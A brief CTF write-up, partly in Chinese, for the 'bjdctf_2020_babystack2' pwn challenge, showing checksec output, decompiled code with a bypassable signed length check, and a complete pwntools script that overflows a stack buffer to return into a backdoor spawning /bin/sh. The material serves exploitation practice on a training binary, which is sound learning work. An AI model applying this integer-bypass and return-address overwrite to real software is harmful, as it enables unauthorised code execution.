HugeH4rD

bjdctf_2020_babystack2

Ubuntu 16

---

0x01

---

checksec

[*] '/home/zelas/Desktop/pwn/bjdctf_2020_babystack2/bjdctf_2020_babystack2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled			//栈不可执行
    PIE:      No PIE (0x400000)

IDA

main()

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[12]; // [rsp+0h] [rbp-10h] BYREF
  size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes);
  if ( (int)nbytes > 10 )				//操作
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  puts("[+]What's u name?");
  read(0, buf, (unsigned int)nbytes);		//buf长度16
  return 0;
}

可疑函数backdoor()

__int64 backdoor()
{
  system("/bin/sh");
  return 1LL;
}

//0x400726

0x02

---

思路

1.nbytes>10 就会exit(),设置nbytes负数

2.利用read()溢出至backdoor()

s	0x10
rbp	0x8
ret	backdoor()

0x03

---

exp

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
io = process(['./bjdctf_2020_babystack2'])
# io = remote('node4.buuoj.cn', 28972)
elf = ELF('./bjdctf_2020_babystack2')

io.sendline(b'-200')

backdoor = 0x400726
padding = 0x10 + 0x8
payload = b'a' * padding
payload += p64(backdoor)
io.sendline(payload)
io.interactive()